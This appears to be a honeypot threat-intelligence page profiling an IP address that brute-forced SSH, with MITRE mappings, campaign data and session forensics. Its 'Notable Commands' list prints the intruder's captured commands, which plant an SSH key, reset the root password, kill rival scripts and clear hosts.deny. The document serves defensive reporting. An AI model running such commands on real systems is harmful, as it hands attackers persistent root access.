IntrusionLabs IntrusionLabs
← Back to feed

58.213.107.138

Threat Confidence
52%
Location
🇨🇳 CN
ASN
AS4134 · Chinanet
Cloud Provider
Total Events
96
Above average by volume
Agent Count
1
First / Last Seen
2026-04-16 20:46 — 2026-04-16 21:18
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595 T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1046 T1082 T1083
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
AS4134 Chinanet ASN Active medium 🇨🇳 CN
64 IPs 5425 events
mysql:bruteforcessh:bruteforce
2026-02-18 — ongoing · 64 IPs from the same network (Chinanet, AS4134) were active during overlapping time periods. Temporal correlation across a …
Session Forensics
scanner ×13 malware_dropper ×1 credential_probe ×1
Sessions
15 (1 with login)
Avg Depth Score
0.21
Commands Executed
20
Files Downloaded
2
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:LXnkwJyvxGBz"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
  • ls -lh $(which ls)
  • which ls
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Scanner ec725bd91d5a w4m_singapore_01 · 2026-04-16 21:16
15%
Loading events...
Scanner 9d79130272ae w4m_singapore_01 · 2026-04-16 21:14
15%
Loading events...
Malware Dropper e3e5a58e8c0e w4m_singapore_01 · 2026-04-16 21:15
20 2 1 100%
Loading events...
Scanner ee3118ff2fd2 w4m_singapore_01 · 2026-04-16 21:15
15%
Loading events...
Scanner 6ea6badaf90e w4m_singapore_01 · 2026-04-16 21:13
15%
Loading events...
Scanner 54a7ab889aa4 w4m_singapore_01 · 2026-04-16 21:11
15%
Loading events...
Scanner 72ab42b01107 w4m_singapore_01 · 2026-04-16 21:10
15%
Loading events...
Scanner 828fb38ade20 w4m_singapore_01 · 2026-04-16 21:06
15%
Loading events...
Scanner b5539f83f57b w4m_singapore_01 · 2026-04-16 21:03
15%
Loading events...
Scanner 32aabc98cc27 w4m_singapore_01 · 2026-04-16 21:02
15%
Loading events...
Scanner 93cb0259519b w4m_singapore_01 · 2026-04-16 21:01
15%
Loading events...
Scanner b2c4a21cfb4d w4m_singapore_01 · 2026-04-16 20:59
15%
Loading events...
Scanner 963576ddf95e w4m_singapore_01 · 2026-04-16 20:56
15%
Loading events...
Scanner 11a795c12ede w4m_singapore_01 · 2026-04-16 20:52
15%
Loading events...
Credential Probe d320ccf9cec0 w4m_singapore_01 · 2026-04-16 20:46
1 20%
Loading events...